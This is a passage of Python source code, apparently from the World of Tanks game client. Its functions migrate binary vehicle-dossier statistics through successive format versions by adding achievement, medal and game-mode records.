vehDossierCompDescrLen = len(compDescr) - updateCtx['headerLength']
a7x7Size = headerValues[6]
max7x7Size = headerValues[11]
achievements7x7Size = headerValues[16]
if vehDossierCompDescrLen != sumAllValues and vehDossierCompDescrLen == sumAllValues - a7x7Size - max7x7Size:
updateCtx['header'][7] = 0
updateCtx['header'][12] = 0
updateCtx['header'][17] = 0
compDescr = struct.pack(updateCtx['headerFormat'], *updateCtx['header']) + compDescr[updateCtx['headerLength']:]
if achievements7x7Size != 0:
compDescr = compDescr[:-achievements7x7Size]
updateCtx = {'dossierCompDescr': compDescr,
'blockSizeFormat': 'H',
'versionFormat': 'H',
'blocksLayout': blocksLayout
}
getHeader(updateCtx)
headerValues = updateCtx['header'][1:]
sumAllValues = sum(headerValues)
vehDossierCompDescrLen = len(compDescr) - updateCtx['headerLength']
setVersion(updateCtx, 70)
return (
70, compDescr)
def __updateFromVehicleDossier70(compDescr):
blocksLayout = [
'a15x15', 'a15x15_2', 'clan', 'clan2', 'company', 'company2', 'a7x7',
'achievements', 'vehTypeFrags', 'total', 'max15x15', 'max7x7', 'inscriptions',
'emblems', 'camouflages', 'compensation', 'achievements7x7']
updateCtx = {'dossierCompDescr': compDescr,
'blockSizeFormat': 'H',
'versionFormat': 'H',
'blocksLayout': blocksLayout
}
getHeader(updateCtx)
recordFormats = [
('potentialDamageReceived', 'I'), ('damageBlockedByArmor', 'I')]
addRecords(updateCtx, 'a15x15_2', recordFormats, {})
addRecords(updateCtx, 'company2', recordFormats, {})
addRecords(updateCtx, 'clan2', recordFormats, {})
addRecords(updateCtx, 'a7x7', recordFormats, {})
setVersion(updateCtx, 71)
return (
71, updateCtx['dossierCompDescr'])
def __updateFromVehicleDossier71(compDescr):
blocksLayout = [
'a15x15', 'a15x15_2', 'clan', 'clan2', 'company', 'company2', 'a7x7',
'achievements', 'vehTypeFrags', 'total', 'max15x15', 'max7x7', 'inscriptions',
'emblems', 'camouflages', 'compensation', 'achievements7x7']
updateCtx = {'dossierCompDescr': compDescr,
'blockSizeFormat': 'H',
'versionFormat': 'H',
'blocksLayout': blocksLayout
}
getHeader(updateCtx)
recordFormats = [
('battlesCountBefore9_0', 'I')]
a15x15packing = {'battlesCount': (4, 'I')}
a15x15defaults = getStaticSizeBlockRecordValues(updateCtx, 'a15x15', a15x15packing)
addRecords(updateCtx, 'a15x15', recordFormats, {'battlesCountBefore9_0': a15x15defaults.get('battlesCount', 0)})
companyPacking = {'battlesCount': (4, 'I')}
companyDefaults = getStaticSizeBlockRecordValues(updateCtx, 'company', companyPacking)
addRecords(updateCtx, 'company', recordFormats, {'battlesCountBefore9_0': companyDefaults.get('battlesCount', 0)})
clanPacking = {'battlesCount': (4, 'I')}
clanDefaults = getStaticSizeBlockRecordValues(updateCtx, 'clan', clanPacking)
addRecords(updateCtx, 'clan', recordFormats, {'battlesCountBefore9_0': clanDefaults.get('battlesCount', 0)})
a7x7packing = {'battlesCount': (4, 'I')}
a7x7defaults = getStaticSizeBlockRecordValues(updateCtx, 'a7x7', a7x7packing)
addRecords(updateCtx, 'a7x7', recordFormats, {'battlesCountBefore9_0': a7x7defaults.get('battlesCount', 0)})
setVersion(updateCtx, 72)
return (
72, updateCtx['dossierCompDescr'])
def __updateFromVehicleDossier72(compDescr):
blocksLayout = [
'a15x15', 'a15x15_2', 'clan', 'clan2', 'company', 'company2', 'a7x7',
'achievements', 'vehTypeFrags', 'total', 'max15x15', 'max7x7', 'inscriptions',
'emblems', 'camouflages', 'compensation', 'achievements7x7']
updateCtx = {'dossierCompDescr': compDescr,
'blockSizeFormat': 'H',
'versionFormat': 'H',
'blocksLayout': blocksLayout
}
getHeader(updateCtx)
setVersion(updateCtx, 73)
return (
73, updateCtx['dossierCompDescr'])
def __updateFromVehicleDossier73(compDescr):
blocksLayout = [
'a15x15', 'a15x15_2', 'clan', 'clan2', 'company', 'company2', 'a7x7',
'achievements', 'vehTypeFrags', 'total', 'max15x15', 'max7x7', 'inscriptions',
'emblems', 'camouflages', 'compensation', 'achievements7x7']
updateCtx = {'dossierCompDescr': compDescr,
'blockSizeFormat': 'H',
'versionFormat': 'H',
'blocksLayout': blocksLayout
}
getHeader(updateCtx)
addBlock(updateCtx, 'historical')
addBlock(updateCtx, 'maxHistorical')
setVersion(updateCtx, 74)
return (
74, updateCtx['dossierCompDescr'])
def __updateFromVehicleDossier74(compDescr):
blocksLayout = [
'a15x15',
'a15x15_2',
'clan',
'clan2',
'company',
'company2',
'a7x7',
'achievements',
'vehTypeFrags',
'total',
'max15x15',
'max7x7',
'inscriptions',
'emblems',
'camouflages',
'compensation',
'achievements7x7',
'historical',
'maxHistorical']
updateCtx = {'dossierCompDescr': compDescr,
'blockSizeFormat': 'H',
'versionFormat': 'H',
'blocksLayout': blocksLayout
}
getHeader(updateCtx)
formats = [
('godOfWar', 'H'),
('fightingReconnaissance', 'H'),
('fightingReconnaissanceMedal', 'H'),
('willToWinSpirit', 'H'),
('crucialShot', 'H'),
('crucialShotMedal', 'H'),
('forTacticalOperations', 'B')]
defaultValues = {'godOfWar': 0,
'fightingReconnaissance': 0,
'fightingReconnaissanceMedal': 0,
'willToWinSpirit': 0,
'crucialShot': 0,
'crucialShotMedal': 0,
'forTacticalOperations': 0
}
addRecords(updateCtx, 'achievements7x7', formats, defaultValues)
setVersion(updateCtx, 75)
return (
75, updateCtx['dossierCompDescr'])
def __updateFromVehicleDossier75(compDescr):
blocksLayout = [
'a15x15',
'a15x15_2',
'clan',
'clan2',
'company',
'company2',
'a7x7',
'achievements',
'vehTypeFrags',
'total',
'max15x15',
'max7x7',
'inscriptions',
'emblems',
'camouflages',
'compensation',
'achievements7x7',
'historical',
'maxHistorical']
updateCtx = {'dossierCompDescr': compDescr,
'blockSizeFormat': 'H',
'versionFormat': 'H',
'blocksLayout': blocksLayout
}
getHeader(updateCtx)
formats = [
('marksOnGun', 'B'),
('movingAvgDamage', 'H')]
addRecords(updateCtx, 'achievements', formats, {})
setVersion(updateCtx, 76)
return (
76, updateCtx['dossierCompDescr'])
def __updateFromVehicleDossier76(compDescr):
blocksLayout = [
'a15x15',
'a15x15_2',
'clan',
'clan2',
'company',
'company2',
'a7x7',
'achievements',
'vehTypeFrags',
'total',
'max15x15',
'max7x7',
'inscriptions',
'emblems',
'camouflages',
'compensation',
'achievements7x7',
'historical',
'maxHistorical']
updateCtx = {'dossierCompDescr': compDescr,
'blockSizeFormat': 'H',
'versionFormat': 'H',
'blocksLayout': blocksLayout
}
getHeader(updateCtx)
formats = [
('medalMonolith', 'H'),
('medalAntiSpgFire', 'H'),
('medalGore', 'H'),
('medalCoolBlood', 'H'),
('medalStark', 'H')]
addRecords(updateCtx, 'achievements', formats, {})
setVersion(updateCtx, 77)
return (
77, updateCtx['dossierCompDescr'])
def __updateFromVehicleDossier77(compDescr):
blocksLayout = [
'a15x15',
'a15x15_2',
'clan',
'clan2',
'company',
'company2',
'a7x7',
'achievements',
'vehTypeFrags',
'total',
'max15x15',
'max7x7',
'inscriptions',
'emblems',
'camouflages',
'compensation',
'achievements7x7',
'historical',
'maxHistorical']
updateCtx = {'dossierCompDescr': compDescr,
'blockSizeFormat': 'H',
'versionFormat': 'H',
'blocksLayout': blocksLayout
}
getHeader(updateCtx)
addBlock(updateCtx, 'uniqueAchievements')
setVersion(updateCtx, 78)
return (
78, updateCtx['dossierCompDescr'])
def __updateFromVehicleDossier78(compDescr):
blocksLayout = [
'a15x15',
'a15x15_2',
'clan',
'clan2',
'company',
'company2',
'a7x7',
'achievements',
'vehTypeFrags',
'total',
'max15x15',
'max7x7',
'inscriptions',
'emblems',
'camouflages',
'compensation',
'achievements7x7',
'historical',
'maxHistorical',
'uniqueAchievements']
updateCtx = {'dossierCompDescr': compDescr,
'blockSizeFormat': 'H',
'versionFormat': 'H',
'blocksLayout': blocksLayout
}
getHeader(updateCtx)
addBlock(updateCtx, 'fortBattles')
addBlock(updateCtx, 'maxFortBattles')
addBlock(updateCtx, 'fortSorties')
addBlock(updateCtx, 'maxFortSorties')
addBlock(updateCtx, 'fortAchievements')
setVersion(updateCtx, 79)
return (
79, updateCtx['dossierCompDescr'])
def __updateFromVehicleDossier79(compDescr):
blocksLayout = [
'a15x15',
'a15x15_2',
'clan',
'clan2',
'company',
'company2',
'a7x7',
'achievements',
'vehTypeFrags',
'total',
'max15x15',
'max7x7',
'inscriptions',
'emblems',
'camouflages',
'compensation',
'achievements7x7',
'historical',
'maxHistorical',
'uniqueAchievements',
'fortBattles',
'maxFortBattles',
'fortSorties',
'maxFortSorties',
'fortAchievements']
updateCtx = {'dossierCompDescr': compDescr,
'blockSizeFormat': 'H',
'versionFormat': 'H',
'blocksLayout': blocksLayout
}
getHeader(updateCtx)
formats = [
('promisingFighter', 'H'),
('promisingFighterMedal', 'H'),
('heavyFire', 'H'),
('heavyFireMedal', 'H'),
('ranger', 'H'),
('rangerMedal', 'H'),
('fireAndSteel', 'H'),
('fireAndSteelMedal', 'H'),
('pyromaniac', 'H'),
('pyromaniacMedal', 'H'),
('noMansLand', 'H')]
defaultValues = {'promisingFighter': 0,
'promisingFighterMedal': 0,
'heavyFire': 0,
'heavyFireMedal': 0,
'ranger': 0,
'rangerMedal': 0,
'fireAndSteel': 0,
'fireAndSteelMedal': 0,
'pyromaniac': 0,
'pyromaniacMedal': 0,
'noMansLand': 0
}
addRecords(updateCtx, 'achievements7x7', formats, defaultValues)
setVersion(updateCtx, 80)
return (
80, updateCtx['dossierCompDescr'])
def __updateFromVehicleDossier80(compDescr):
blocksLayout = [
'a15x15',
'a15x15_2',
'clan',
'clan2',
'company',
'company2',
'a7x7',
'achievements',
'vehTypeFrags',
'total',
'max15x15',
'max7x7',
'inscriptions',
'emblems',
'camouflages',
'compensation',
'achievements7x7',
'historical',
'maxHistorical',
'uniqueAchievements',
'fortBattles',
'maxFortBattles',
'fortSorties',
'maxFortSorties',
'fortAchievements']
updateCtx = {'dossierCompDescr': compDescr,
'blockSizeFormat': 'H',
'versionFormat': 'H',
'blocksLayout': blocksLayout
}
getHeader(updateCtx)
formats = [
('damageRating', 'H')]
addRecords(updateCtx, 'achievements', formats, {})
setVersion(updateCtx, 81)
return (
81, updateCtx['dossierCompDescr'])
def __updateFromVehicleDossier81(compDescr):
blocksLayout = [
'a15x15',
'a15x15_2',
'clan',
'clan2',
'company',
'company2',
'a7x7',
'achievements',
'vehTypeFrags',
'total',
'max15x15',
'max7x7',
'inscriptions',
'emblems',
'camouflages',
'compensation',
'achievements7x7',
'historical',
'maxHistorical',
'uniqueAchievements',
'fortBattles',
'maxFortBattles',
'fortSorties',
'maxFortSorties',
'fortAchievements']
updateCtx = {'dossierCompDescr': compDescr,
'blockSizeFormat': 'H',
'versionFormat': 'H',
'blocksLayout': blocksLayout
}
getHeader(updateCtx)
awardCount = _count7x7awards(updateCtx)
formats = [
('guerrilla', 'H'),
('guerrillaMedal', 'H'),
('infiltrator', 'H'),
('infiltratorMedal', 'H'),
('sentinel', 'H'),
('sentinelMedal', 'H'),
('prematureDetonation', 'H'),
('prematureDetonationMedal', 'H'),
('bruteForce', 'H'),
('bruteForceMedal', 'H'),
('awardCount', 'I'),
('battleTested', 'B')]
defaultValues = {'guerrilla': 0,
'guerrillaMedal': 0,
'infiltrator': 0,
'infiltratorMedal': 0,
'sentinel': 0,
'sentinelMedal': 0,
'prematureDetonation': 0,
'prematureDetonationMedal': 0,
'bruteForce': 0,
'bruteForceMedal': 0,
'awardCount': awardCount,
'battleTested': 0
}
addRecords(updateCtx, 'achievements7x7', formats, defaultValues)
setVersion(updateCtx, 82)
return (
82, updateCtx['dossierCompDescr'])
def __updateFromVehicleDossier82(compDescr):
blocksLayout = [
'a15x15',
'a15x15_2',
'clan',
'clan2',
'company',
'company2',
'a7x7',
'achievements',
'vehTypeFrags',
'total',
'max15x15',
'max7x7',
'inscriptions',
'emblems',
'camouflages',
'compensation',
'achievements7x7',
'historical',
'maxHistorical',
'uniqueAchievements',
'fortBattles',
'maxFortBattles',
'fortSorties',
'maxFortSorties',
'fortAchievements']
updateCtx = {'dossierCompDescr': compDescr,
'blockSizeFormat': 'H',
'versionFormat': 'H',
'blocksLayout': blocksLayout
}
getHeader(updateCtx)
layout = [
'titleSniper',
'invincible',
'diehard',
'handOfDeath',
'armorPiercer',
'tacticalBreakthrough']
values = {}
achievementsPacking = {'titleSniper': (88, 'B'),
'invincible': (89, 'B'),
'diehard': (90, 'B'),
'handOfDeath': (93, 'B'),
'armorPiercer': (94, 'B')
}
values.update(getStaticSizeBlockRecordValues(updateCtx, 'achievements', achievementsPacking))
achievements7x7Packing = {'tacticalBreakthrough': (16, 'B')
}
values.update(getStaticSizeBlockRecordValues(updateCtx, 'achievements7x7', achievements7x7Packing))
blockFormat, blockValues = getNewBinarySetBlockValues(layout, values)
addBlock(updateCtx, 'singleAchievements', blockFormat, blockValues)
removeRecords(updateCtx, 'achievements', achievementsPacking)
removeRecords(updateCtx, 'achievements7x7', achievements7x7Packing)
setVersion(updateCtx, 83)
return (
83, updateCtx['dossierCompDescr'])
def __updateFromVehicleDossier83(compDescr):
blocksLayout = [
'a15x15',
'a15x15_2',
'clan',
'clan2',
'company',
'company2',
'a7x7',
'achievements',
'vehTypeFrags',
'total',
'max15x15',
'max7x7',
'inscriptions',
'emblems',
'camouflages',
'compensation',
'achievements7x7',
'historical',
'maxHistorical',
'uniqueAchievements',
'fortBattles',
'maxFortBattles',
'fortSorties',
'maxFortSorties',
'fortAchievements',
'singleAchievements']
updateCtx = {'dossierCompDescr': compDescr,
'blockSizeFormat': 'H',
'versionFormat': 'H',
'blocksLayout': blocksLayout
}
getHeader(updateCtx)
blockLayout = [
('medalRotmistrov', 'B')]
blockFormat, blockValues = getNewStaticSizeBlockValues(blockLayout, {'medalRotmistrov': 0})
addBlock(updateCtx, 'clanAchievements', blockFormat, blockValues)
setVersion(updateCtx, 84)
return (
84, updateCtx['dossierCompDescr'])
def __updateFromVehicleDossier84(compDescr):
blocksLayout = [
'a15x15',
'a15x15_2',
'clan',
'clan2',
'company',
'company2',
'a7x7',
'achievements',
'vehTypeFrags',
'total',
'max15x15',
'max7x7',
'inscriptions',
'emblems',
'camouflages',
'compensation',
'achievements7x7',
'historical',
'maxHistorical',
'uniqueAchievements',
'fortBattles',
'maxFortBattles',
'fortSorties',
'maxFortSorties',
'fortAchievements',
'singleAchievements',
'clanAchievements']
updateCtx = {'dossierCompDescr': compDescr,
'blockSizeFormat': 'H',
'versionFormat': 'H',
'blocksLayout': blocksLayout
}
getHeader(updateCtx)
a15x15packing = {'battlesCountBefore9_0': (68, 'I'),'battlesCountBefore8_8': (56, 'I')}
values = getStaticSizeBlockRecordValues(updateCtx, 'a15x15', a15x15packing)
if values and values['battlesCountBefore8_8'] > 0 and values['battlesCountBefore9_0'] == 0:
values['battlesCountBefore9_0'] = values['battlesCountBefore8_8']
setStaticSizeBlockRecordValues(updateCtx, 'a15x15', a15x15packing, values)
clanPacking = {'battlesCountBefore9_0': (60, 'I'),'battlesCountBefore8_9': (56, 'I')}
values = getStaticSizeBlockRecordValues(updateCtx, 'clan', clanPacking)
if values and values['battlesCountBefore8_9'] > 0 and values['battlesCountBefore9_0'] == 0:
values['battlesCountBefore9_0'] = values['battlesCountBefore8_9']
setStaticSizeBlockRecordValues(updateCtx, 'clan', clanPacking, values)
companyPacking = {'battlesCountBefore9_0': (60, 'I'),'battlesCountBefore8_9': (56, 'I')}
values = getStaticSizeBlockRecordValues(updateCtx, 'company', companyPacking)
if values and values['battlesCountBefore8_9'] > 0 and values['battlesCountBefore9_0'] == 0:
values['battlesCountBefore9_0'] = values['battlesCountBefore8_9']
setStaticSizeBlockRecordValues(updateCtx, 'company', companyPacking, values)
setVersion(updateCtx, 85)
return (
85, updateCtx['dossierCompDescr'])
def __updateFromVehicleDossier85(compDescr):
blocksLayout = [
'a15x15',
'a15x15_2',
'clan',
'clan2',
'company',
'company2',
'a7x7',
'achievements',
'vehTypeFrags',
'total',
'max15x15',
'max7x7',
'inscriptions',
'emblems',
'camouflages',
'compensation',
'achievements7x7',
'historical',
'maxHistorical',
'uniqueAchievements',
'fortBattles',
'maxFortBattles',
'fortSorties',
'maxFortSorties',
'fortAchievements',
'singleAchievements',
'clanAchievements']
updateCtx = {'dossierCompDescr': compDescr,
'blockSizeFormat': 'H',
'versionFormat': 'H',
'blocksLayout': blocksLayout
}
getHeader(updateCtx)
recordFormats = [
('impenetrable', 'H'),
('maxAimerSeries', 'B'),
('shootToKill', 'H'),
('fighter', 'H'),
('duelist', 'H'),
('demolition', 'H'),
('arsonist', 'H'),
('bonecrusher', 'H'),
('charmed', 'H'),
('even', 'H')]
addRecords(updateCtx, 'achievements', recordFormats, {})
setVersion(updateCtx, 86)
return (
86, updateCtx['dossierCompDescr'])
def __updateFromVehicleDossier86(compDescr):
blocksLayout = [
'a15x15',
'a15x15_2',
'clan',
'clan2',
'company',
'company2',
'a7x7',
'achievements',
'vehTypeFrags',
'total',
'max15x15',
'max7x7',
'inscriptions',
'emblems',
'camouflages',
'compensation',
'achievements7x7',
'historical',
'maxHistorical',
'uniqueAchievements',
'fortBattles',
'maxFortBattles',
'fortSorties',
'maxFortSorties',
'fortAchievements',
'singleAchievements',
'clanAchievements']
updateCtx = {'dossierCompDescr': compDescr,
'blockSizeFormat': 'H',
'versionFormat': 'H',
'blocksLayout': blocksLayout
}
getHeader(updateCtx)
recordFormats = [
('wins', 'H'),
('capturedBasesInAttack', 'H'),
('capturedBasesInDefence', 'H')]
addRecords(updateCtx, 'fortAchievements', recordFormats, {})
setVersion(updateCtx, 87)
return (
87, updateCtx['dossierCompDescr'])
def __updateFromVehicleDossier87(compDescr):
blocksLayout = [
'a15x15',
'a15x15_2',
'clan',
'clan2',
'company',
'company2',
'a7x7',
'achievements',
'vehTypeFrags',
'total',
'max15x15',
'max7x7',
'inscriptions',
'emblems',
'camouflages',
'compensation',
'achievements7x7',
'historical',
'maxHistorical',
'uniqueAchievements',
'fortBattles',
'maxFortBattles',
'fortSorties',
'maxFortSorties',
'fortAchievements',
'singleAchievements',
'clanAchievements']
updateCtx = {'dossierCompDescr': compDescr,
'blockSizeFormat': 'H',
'versionFormat': 'H',
'blocksLayout': blocksLayout
}
getHeader(updateCtx)
addBlock(updateCtx, 'rated7x7')
addBlock(updateCtx, 'maxRated7x7')
setVersion(updateCtx, 88)
return (
88, updateCtx['dossierCompDescr'])
def __updateFromVehicleDossier88(compDescr):
blocksLayout = [
'a15x15',
'a15x15_2',
'clan',
'clan2',
'company',
'company2',
'a7x7',
'achievements',
'vehTypeFrags',
'total',
'max15x15',
'max7x7',
'inscriptions',
'emblems',
'camouflages',
'compensation',
'achievements7x7',
'historical',
'maxHistorical',
'uniqueAchievements',
'fortBattles',
'maxFortBattles',
'fortSorties',
'maxFortSorties',
'fortAchievements',
'singleAchievements',
'clanAchievements',
'rated7x7',
'maxRated7x7']
updateCtx = {'dossierCompDescr': compDescr,
'blockSizeFormat': 'H',
'versionFormat': 'H',
'blocksLayout': blocksLayout
}
getHeader(updateCtx)
battleHeroes7x7Count = _countBattleHeroesBasedOn7x7Medals(updateCtx)
if battleHeroes7x7Count > 0:
achievementsPacking = {'battleHeroes': (20, 'H'),'medalKay': (38, 'B')}
values = getStaticSizeBlockRecordValues(updateCtx, 'achievements', achievementsPacking)
if values:
values['battleHeroes'] += battleHeroes7x7Count
values['medalKay'] = _medalKayClass(values['battleHeroes'])
setStaticSizeBlockRecordValues(updateCtx, 'achievements', achievementsPacking, values)
setVersion(updateCtx, 89)
return (
89, updateCtx['dossierCompDescr'])
def __updateFromVehicleDossier89(compDescr):
blocksLayout = [
'a15x15',
'a15x15_2',
'clan',
'clan2',
'company',
'company2',
'a7x7',
'achievements',
'vehTypeFrags',
'total',
'max15x15',
'max7x7',
'inscriptions',
'emblems',
'camouflages',
'compensation',
'achievements7x7',
'historical',
'maxHistorical',
'uniqueAchievements',
'fortBattles',
'maxFortBattles',
'fortSorties',
'maxFortSorties',
'fortAchievements',
'singleAchievements',
'clanAchievements',
'rated7x7',
'maxRated7x7']
updateCtx = {'dossierCompDescr': compDescr,
'blockSizeFormat': 'H',
'versionFormat': 'H',
'blocksLayout': blocksLayout
}
getHeader(updateCtx)
gmDefaults = {}
clanPacking = {'spotted': (32, 'I'),
'damageDealt': (36, 'I'),'wins': (8, 'I'),'capturePoints': (44, 'I'),'losses': (12, 'I'),
'survivedBattles': (16, 'I'),'droppedCapturePoints': (48, 'I'),'battlesCount': (4, 'I'),
'damageReceived': (40, 'I'),'shots': (24, 'I'),'frags': (20, 'I'),
'xp': (0, 'I'),'directHits': (28, 'I')}
gmDefaults.update(getStaticSizeBlockRecordValues(updateCtx, 'clan', clanPacking))
clan2Packing = {'directHitsReceived': (12, 'I'),
'damageAssistedTrack': (4, 'I'),'explosionHitsReceived': (24, 'I'),'potentialDamageReceived': (36, 'I'),
'piercingsReceived': (20, 'I'),'originalXP': (0, 'I'),'damageAssistedRadio': (8, 'I'),
'piercings': (32, 'I'),'explosionHits': (28, 'I'),'damageBlockedByArmor': (40, 'I'),
'noDamageDirectHitsReceived': (16, 'I')}
gmDefaults.update(getStaticSizeBlockRecordValues(updateCtx, 'clan2', clan2Packing))
gmLayout = [
('xp', 'I'), ('battlesCount', 'I'), ('wins', 'I'), ('losses', 'I'), ('survivedBattles', 'I'), ('frags', 'I'),
('shots', 'I'), ('directHits', 'I'), ('spotted', 'I'), ('damageDealt', 'I'), ('damageReceived', 'I'),
('capturePoints', 'I'), ('droppedCapturePoints', 'I'), ('originalXP', 'I'), ('damageAssistedTrack', 'I'),
('damageAssistedRadio', 'I'), ('directHitsReceived', 'I'), ('noDamageDirectHitsReceived', 'I'),
('piercingsReceived', 'I'), ('explosionHitsReceived', 'I'), ('explosionHits', 'I'), ('piercings', 'I'),
('winAndSurvived', 'I'), ('frags8p', 'I'), ('potentialDamageReceived', 'I'), ('damageBlockedByArmor', 'I')]
blockFormat, blockValues = getNewStaticSizeBlockValues(gmLayout, gmDefaults)
addBlock(updateCtx, 'globalMapCommon', blockFormat, blockValues)
setVersion(updateCtx, 90)
return (
90, updateCtx['dossierCompDescr'])
def __updateFromVehicleDossier90(compDescr):
blocksLayout = [
'a15x15',
'a15x15_2',
'clan',
'clan2',
'company',
'company2',
'a7x7',
'achievements',
'vehTypeFrags',
'total',
'max15x15',
'max7x7',
'inscriptions',
'emblems',
'camouflages',
'compensation',
'achievements7x7',
'historical',
'maxHistorical',
'uniqueAchievements',
'fortBattles',
'maxFortBattles',
'fortSorties',
'maxFortSorties',
'fortAchievements',
'singleAchievements',
'clanAchievements',
'rated7x7',
'maxRated7x7',
'globalMapCommon']
updateCtx = {'dossierCompDescr': compDescr,
'blockSizeFormat': 'H',
'versionFormat': 'H',
'blocksLayout': blocksLayout
}
getHeader(updateCtx)
clanPacking = {'xpBefore8_9': (52, 'I'),'battlesCountBefore9_0': (60, 'I'),'battlesCountBefore8_9': (56, 'I')}
clanValues = getStaticSizeBlockRecordValues(updateCtx, 'clan', clanPacking)
recordFormats = [
('xpBefore8_9', 'I'),
('battlesCountBefore8_9', 'I'),
('battlesCountBefore9_0', 'I')]
addRecords(updateCtx, 'globalMapCommon', recordFormats, clanValues)
setVersion(updateCtx, 91)
return (
91, updateCtx['dossierCompDescr'])
def __updateFromVehicleDossier91(compDescr):
blocksLayout = [
'a15x15',
'a15x15_2',
'clan',
'clan2',
'company',
'company2',
'a7x7',
'achievements',
'vehTypeFrags',
'total',
'max15x15',
'max7x7',
'inscriptions',
'emblems',
'camouflages',
'compensation',
'achievements7x7',
'historical',
'maxHistorical',
'uniqueAchievements',
'fortBattles',
'maxFortBattles',
'fortSorties',
'maxFortSorties',
'fortAchievements',
'singleAchievements',
'clanAchievements',
'rated7x7',
'maxRated7x7',
'globalMapCommon']
updateCtx = {'dossierCompDescr': compDescr,
'blockSizeFormat': 'H',
'versionFormat': 'H',
'blocksLayout': blocksLayout
}
getHeader(updateCtx)
addBlock(updateCtx, 'maxGlobalMapCommon')
setVersion(updateCtx, 92)
return (
92, updateCtx['dossierCompDescr'])
def __updateFromVehicleDossier92(compDescr):
blocksLayout = [
'a15x15',
'a15x15_2',
'clan',
'clan2',
'company',
'company2',
'a7x7',
'achievements',
'vehTypeFrags',
'total',
'max15x15',
'max7x7',
'inscriptions',
'emblems',
'camouflages',
'compensation',
'achievements7x7',
'historical',
'maxHistorical',
'uniqueAchievements',
'fortBattles',
'maxFortBattles',
'fortSorties',
'maxFortSorties',
'fortAchievements',
'singleAchievements',
'clanAchievements',
'rated7x7',
'maxRated7x7',
'globalMapCommon',
'maxGlobalMapCommon']
updateCtx = {'dossierCompDescr': compDescr,
'blockSizeFormat': 'H',
'versionFormat': 'H',
'blocksLayout': blocksLayout
}
getHeader(updateCtx)
addBlock(updateCtx, 'fallout')
addBlock(updateCtx, 'maxFallout')
setVersion(updateCtx, 93)
return (
93, updateCtx['dossierCompDescr'])
def __updateFromVehicleDossier93(compDescr):
blocksLayout = [
'a15x15',
'a15x15_2',
'clan',
'clan2',
'company',
'company2',
'a7x7',
'achievements',
'vehTypeFrags',
'total',
'max15x15',
'max7x7',
'inscriptions',
'emblems',
'camouflages',
'compensation',
'achievements7x7',
'historical',
'maxHistorical',
'uniqueAchievements',
'fortBattles',
'maxFortBattles',
'fortSorties',
'maxFortSorties',
'fortAchievements',
'singleAchievements',
'clanAchievements',
'rated7x7',
'maxRated7x7',
'globalMapCommon',
'maxGlobalMapCommon',
'fallout',
'maxFallout']
updateCtx = {'dossierCompDescr': compDescr,
'blockSizeFormat': 'H',
'versionFormat': 'H',
'blocksLayout': blocksLayout
}
getHeader(updateCtx)
addBlock(updateCtx, 'falloutAchievements')
setVersion(updateCtx, 94)
return (
94, updateCtx['dossierCompDescr'])
def __updateFromVehicleDossier94(compDescr):
blocksLayout = [
'a15x15',
'a15x15_2',
'clan',
'clan2',
'company',
'company2',
'a7x7',
'achievements',
'vehTypeFrags',
'total',
'max15x15',
'max7x7',
'inscriptions',
'emblems',
'camouflages',
'compensation',
'achievements7x7',
'historical',
'maxHistorical',
'uniqueAchievements',
'fortBattles',
'maxFortBattles',
'fortSorties',
'maxFortSorties',
'fortAchievements',
'singleAchievements',
'clanAchievements',
'rated7x7',
'maxRated7x7',
'globalMapCommon',
'maxGlobalMapCommon',
'fallout',
'maxFallout']
updateCtx = {'dossierCompDescr': compDescr,
'blockSizeFormat': 'H',
'versionFormat': 'H',
'blocksLayout': blocksLayout
}
getHeader(updateCtx)
modes = ('a15x15_2', 'clan2', 'company2', 'a7x7', 'historical', 'fortBattles',
'fortSorties', 'rated7x7', 'globalMapCommon', 'fallout')
for mode in modes:
recordsFormat = [('battlesOnStunningVehicles', 'I'),
('stunNum', 'I'),
('damageAssistedStun', 'I')]
addRecords(updateCtx, mode, recordsFormat, {})
setVersion(updateCtx, 95)
return (
95, updateCtx['dossierCompDescr'])
def __updateFromVehicleDossier95(compDescr):
blocksLayout = [
'a15x15',
'a15x15_2',
'clan',
'clan2',
'company',
'company2',
'a7x7',
'achievements',
'vehTypeFrags',
'total',
'max15x15',
'max7x7',
'inscriptions',
'emblems',
'camouflages',
'compensation',
'achievements7x7',
'historical',
'maxHistorical',
'uniqueAchievements',
'fortBattles',
'maxFortBattles',
'fortSorties',
'maxFortSorties',
'fortAchievements',
'singleAchievements',
'clanAchievements',
'rated7x7',
'maxRated7x7',
'globalMapCommon',
'maxGlobalMapCommon',
'fallout',
'maxFallout',
'falloutAchievements']
updateCtx = {'dossierCompDescr': compDescr,
'blockSizeFormat': 'H',
'versionFormat': 'H',
'blocksLayout': blocksLayout
}
getHeader(updateCtx)
battlesOnStunningVehiclesOffsets = {'fortBattles': 104,'globalMapCommon': 116,'a15x15_2': 44,
'fortSorties': 104,'historical': 104,
'rated7x7': 104,'clan2': 44,
'fallout': 128,'company2': 44,
'a7x7': 108}
for block, offset in battlesOnStunningVehiclesOffsets.iteritems():
lastFieldKey = {'a7x7': 'battlesCountBefore9_0',
'globalMapCommon': 'battlesCountBefore9_0',
'fallout': 'deathCount'
}.get(block, 'damageBlockedByArmor')
packing = {lastFieldKey: (offset - 4, 'I'),'battlesOnStunningVehicles': (
offset, 'I'),
'stunNum': (
offset + 4, 'I'),
'damageAssistedStun': (
offset + 8, 'I')
}
values = getStaticSizeBlockRecordValues(updateCtx, block, packing)
if not values:
continue
lastField = values[lastFieldKey]
stunNum = values['stunNum']
damageAssistedStun = values['damageAssistedStun']
if damageAssistedStun <= 65535:
continue
elif 0 == stunNum:
setStaticSizeBlockRecordValues(updateCtx, block, {lastFieldKey: (offset - 4, 'I'),'damageAssistedStun': (
offset + 8, 'I')
}, {lastFieldKey: lastField + (damageAssistedStun & 4294901760L),'damageAssistedStun': damageAssistedStun & 65535
})
elif 0 != stunNum and damageAssistedStun > 65535:
if 'a15x15_2' != block:
continue
else:
piercingPacking = {'noDamageDirectHitsReceived': (16, 'I'),'directHitsReceived': (12, 'I'),'potentialDamageReceived': (36, 'I'),
'piercingsReceived': (20, 'I')}
damageReceivedPacking = {'damageReceived': (40, 'I')}
data = getStaticSizeBlockRecordValues(updateCtx, 'a15x15_2', piercingPacking)
data.update(getStaticSizeBlockRecordValues(updateCtx, 'a15x15', damageReceivedPacking))
if data['piercingsReceived'] < 50 or data['directHitsReceived'] < 50:
continue
else:
potentialDamagePerHit = 1.0 * data['potentialDamageReceived'] / data['directHitsReceived']
aproxDamageBlockedByArmor = data['potentialDamageReceived'] - data['damageReceived']
if data['noDamageDirectHitsReceived'] < 50 or aproxDamageBlockedByArmor <= 65535:
continue
potentialDamagePerHitForBlockedDamage = 1.0 * lastField / data['noDamageDirectHitsReceived']
